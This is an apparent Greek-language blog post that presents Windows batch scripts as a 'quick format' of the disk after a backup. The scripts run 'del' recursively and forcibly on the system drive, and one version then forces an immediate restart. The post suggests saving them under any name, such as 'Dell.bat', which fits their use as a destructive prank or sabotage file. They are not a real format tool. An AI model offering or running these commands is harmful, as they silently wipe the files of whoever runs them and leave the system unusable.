Format στον δίσκο μέσω του notepad

Σε περίπτωση που έχουμε κάνει backup τα αρχεία μας και θέλουμε να κάνουμε ένα γρήγορο φορμάτ στον δίσκο μας τότε μπορούμε να γράψουμε τον ακόλουθο κώδικα σε ένα αρχείο σημειωματαρείου και να το τρέξουμε σαν .bat αρχείο.

Κώδικας:

@Echo off
Del C:\ *.*y

το σώζουμε σαν Dell.bat

ή ακόμα χειρότερα:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

και το σώζουμε σαν .bat με ότι ονομασία θέλουμε.

2 Σχόλια to “Format στον δίσκο μέσω του notepad”

Υποβολή σχολίου

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Αλλαγή )

Twitter picture

You are commenting using your Twitter account. Log Out / Αλλαγή )

Facebook photo

You are commenting using your Facebook account. Log Out / Αλλαγή )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 78 other followers